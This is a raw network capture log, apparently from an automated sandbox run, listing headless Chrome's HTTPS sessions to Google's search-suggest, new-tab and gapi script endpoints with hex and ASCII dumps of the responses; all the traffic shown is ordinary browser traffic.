2024-12-27 20:20:29 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 20:20:30 UTC	1219	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 20:20:29 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-o4WXJyf9wM6jjh4MWBI7xw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/web Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/web"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 20:20:30 UTC	171	IN	Data Raw: 61 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 5d 2c 5b 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 36 30 39 39 30 34 32 30 34 35 39 37 39 38 37 30 30 34 39 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 5d 2c 22 67 6f 6f 67 6c 65 3a 76 65 72 62 61 74 69 6d 72 65 6c 65 76 61 6e 63 65 22 3a 38 35 31 7d 5d 0d 0a Data Ascii: a5)]}'["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":6099042045979870049,"google:suggesttype":[],"google:verbatimrelevance":851}]
2024-12-27 20:20:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	172.217.21.36	443	764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:29 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 20:20:30 UTC	973	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 27 Dec 2024 20:20:29 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 20:20:30 UTC	417	IN	Data Raw: 32 39 65 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 29e4)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 33 20 31 38 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 35 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 37 76 32 68 31 38 Data Ascii: ss\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 41 64 20 67 62 5f 6c 64 20 67 62 5f 4b 65 20 67 62 5f 46 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 Data Ascii: e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_Ad gb_ld gb_Ke gb_Fe\"\u003e\u003c
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38 2e 35 2d 32 31 2e 35 54 33 35 30 2d 38 34 30 68 32 36 30 71 31 33 20 30 20 32 31 2e 35 20 38 2e 35 54 36 34 30 2d 38 31 30 71 30 20 Data Ascii: ght\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8.5-21.5T350-840h260q13 0 21.5 8.5T640-810q0
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 5c 22 5c 75 30 30 Data Ascii: ,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z\"\u00
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e Data Ascii: eriment_id":[3700245,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b Data Ascii: +)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};
2024-12-27 20:20:30 UTC	1390	IN	Data Raw: 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a Data Ascii: n(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:
2024-12-27 20:20:30 UTC	585	IN	Data Raw: 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 Data Ascii: 3db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u0
2024-12-27 20:20:30 UTC	377	IN	Data Raw: 31 37 32 0d 0a 22 2c 72 6f 77 73 70 61 6e 3a 5c 22 72 6f 77 53 70 61 6e 5c 22 2c 74 79 70 65 3a 5c 22 74 79 70 65 5c 22 2c 75 73 65 6d 61 70 3a 5c 22 75 73 65 4d 61 70 5c 22 2c 76 61 6c 69 67 6e 3a 5c 22 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 6c 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 6d 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 Data Ascii: 172",rowspan:\"rowSpan\",type:\"type\",usemap:\"useMap\",valign:\"vAlign\",width:\"width\"};\n_.le\u003dfunction(a){return a?a.defaultView:window};_.oe\u003dfunction(a,b){const c\u003db[1],d\u003d_.me(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	172.217.21.36	443	764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:29 UTC	361	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 20:20:30 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 27 Dec 2024 20:20:29 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 20:20:30 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 20:20:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49759	142.250.181.78	443	764	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:20:36 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 20:20:37 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Dec 2024 04:36:02 GMT Expires: Fri, 26 Dec 2025 04:36:02 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 143075 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-27 20:20:37 UTC	474	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var 